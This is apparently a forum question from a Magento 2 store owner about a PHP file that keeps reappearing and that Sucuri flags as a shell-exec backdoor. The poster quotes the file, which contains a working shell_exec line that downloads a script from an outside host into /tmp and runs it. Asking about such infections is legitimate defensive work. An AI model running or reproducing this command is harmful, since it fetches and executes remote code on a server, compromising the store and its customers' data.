I have installed Data Feed watch on my Magento 2 store and also installed Sucuri Monitoring, it always sends me a malware warning of “php.backdoor.shell-exec.014” for some files like “media/feed/tmp/16699072529768.php”
I removed the file but after some days it automatically generated and it has code below
<?php function exec_feed_variable_0a1d9c991efeed84a978b4465847bd54782a9e209b39e199279150d24fc83500($product, $objectManager)
{var_dump(shell_exec('curl -qs myj.uk.to/reverse.js > /tmp/1.php ; php -f /tmp/1.php 2>&1 &'));}
echo exec_feed_variable_0a1d9c991efeed84a978b4465847bd54782a9e209b39e199279150d24fc83500($product, $objectManager); ?>
Please let me know what this code does and how to remove it so it won’t come again.